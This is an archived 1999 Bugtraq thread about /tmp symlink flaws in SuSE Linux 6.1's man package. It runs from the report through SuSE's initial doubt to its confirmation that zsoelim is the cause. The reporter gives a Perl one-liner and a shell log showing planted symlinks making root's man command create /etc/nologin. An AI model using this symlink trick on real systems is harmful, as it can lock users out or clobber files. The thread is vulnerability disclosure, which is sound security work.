suse.6.1.tmp.symlinks.txt

🗓️ 17 Aug 1999 00:00:00 · Reported by Packet Storm · Type: packetstorm · 🔗 packetstormsecurity.com · 👁 29 Views

Symlink issues in SuSE Linux 6.1 allow creation of arbitrary files in /tmp directory.


Date: Wed, 2 Jun 1999 11:01:32 +0200  
From: Thomas Fischbacher <[email protected]>  
To: [email protected]  
Subject: /tmp symlink problems in SuSE Linux 6.1  
  
I notified SuSE GmbH several weeks ago about this problem, but didn't get  
any response, therefore this post to Bugtraq.  
  
  
With SuSE Linux 6.1 there are still a few programs around which blindly  
create files in /tmp regardless of whether a symlink or something  
similarly evil already exists in that place. Among these programs are  
'man' and 'dvips'.  
  
  
Though it seems to be impossible by now to overwrite /etc/passwd with a  
plain simple /tmp/zman01234aaa symlink (didn't check if the source is  
race-condition free, though), one can still create arbitrary  
files which do funny things. Example:  
  
perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'  
  
  
--  
regards, [email protected] (o_  
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\  
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_  
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))  
  
-------------------------------------------------------------------------------  
  
Date: Fri, 4 Jun 1999 09:52:36 +0200  
From: Thomas Biege <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
Hi,  
we at SuSE could not reproduce this problem, either for  
man or for dvips.  
  
Please send us a full list of "maybe" buggy tools, so we  
could evaluate them.  
  
Bye,  
Thomas  
  
PS: I never saw your email on your mailing lists.  
  
--  
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"  
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82  
  
-------------------------------------------------------------------------------  
  
Date: Fri, 4 Jun 1999 16:36:46 +0200  
From: Thomas Fischbacher <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
> Hi,  
> we at SuSE could not reproduce this problem, either for  
> man or for dvips.  
  
Ok, here is a log of what I just did five minutes ago:  
(emacs -- M-x shell, btw.)  
  
  
brauneck:~ # whoami  
root  
brauneck:~ # cd /tmp  
brauneck:/tmp # cat /etc/SuSE-release  
SuSE Linux 6.1 (i386)  
VERSION = 6.1  
brauneck:/tmp # rpm -q man  
man-2.3.10-62  
brauneck:/tmp # md5sum /usr/bin/man  
b383967ce695352002f077680e375c62 /usr/bin/man  
brauneck:/tmp # su tf  
tf@brauneck:/tmp > export LS_OPTIONS=''  
tf@brauneck:/tmp > export LS_COLORS=''  
tf@brauneck:/tmp > ls zman*  
ls: zman*: No such file or directory  
tf@brauneck:/tmp > /bin/bash -c "echo $$"  
6056  
tf@brauneck:/tmp > # this gives me a current pid range  
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'  
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa  
lrwxrwxrwx 1 tf stud 12 Jun 4 16:28 /tmp/zman06123aaa -> /etc/nologin  
tf@brauneck:/tmp > ls -l /etc/nologin  
ls: /etc/nologin: No such file or directory  
tf@brauneck:/tmp > exit  
brauneck:/tmp # man mmap  
Reformatting mmap(2), please wait...  
WARNING: terminal is not fully functional  
  
  
  
  
MMAP(2) Linux Programmer's Manual MMAP(2)  
  
  
NAME  
mmap, munmap - map or unmap files or devices into memory  
  
SYNOPSIS  
#include <unistd.h>  
#include <sys/mman.h>  
  
#ifdef _POSIX_MAPPED_FILES  
  
void * mmap(void *start, size_t length, int prot , int  
flags, int fd, off_t offset);  
  
int munmap(void *start, size_t length);  
  
#endif  
  
DESCRIPTION  
  
  
brauneck:/tmp # ls -la /etc/nologin  
-rw-r--r-- 1 root root 4319 Jun 4 16:30 /etc/nologin  
brauneck:/tmp # ls /tmp/zman0* | wc -l  
999  
brauneck:/tmp # # Note that one link was removed!  
brauneck:/tmp #  
  
You see -- the problem definitely is not fiction! Come over to Munich and  
see for yourself if you want.  
  
  
> Please send us a full list of "maybe" buggy tools, so we  
> could evaluate them.  
  
?  
  
> PS: I never saw your email at your mailinglists.  
  
?  
  
--  
regards, [email protected] (o_  
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\  
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_  
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))  
  
-------------------------------------------------------------------------------  
  
Date: Sat, 5 Jun 1999 07:13:28 +0200  
From: Thomas Biege <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
On Fri, 4 Jun 1999, Thomas Fischbacher wrote:  
  
> > we at SuSE could not reproduce this problem, either for  
> > man or for dvips.  
>  
> Ok, here is a log of what I just did five minutes ago:  
> (emacs -- M-x shell, btw.)  
  
[...]  
  
> You see -- the problem definitely is not fiction! Come over to Munich and  
> see for yourself if you want.  
  
I don't think it's fiction...  
... the fact is that just old releases of SuSE 6.1 seem to be  
vulnerable; the newer releases don't - man uses open(O_EXCL) and  
drops its privileges.  
  
A customer told me that the behavior you described just happens  
when he opens a big man page for the first time... we will check  
this as soon as possible.  
  
> > Please send us a full list of "maybe" buggy tools, so we  
> > could evaluate them.  
> ?  
  
In your first post to bugtraq you mentioned that more tools have  
/tmp symlink problems... feel free to tell us about them.  
(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)  
  
Bye,  
Thomas  
--  
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"  
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82  
  
-------------------------------------------------------------------------------  
  
Date: Sat, 5 Jun 1999 22:02:19 +0200  
From: Marc Heuse <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
Hi,  
  
we confirmed the link vulnerability in the man package.  
The culprit is zsoelim which creates the file without looking left and  
right. :-(  
  
All linux distributions using man 2.3.10 should be affected.  
  
A fixed package from us will be available soon.  
  
Greets,  
Marc  
--  
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"  
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C  
  
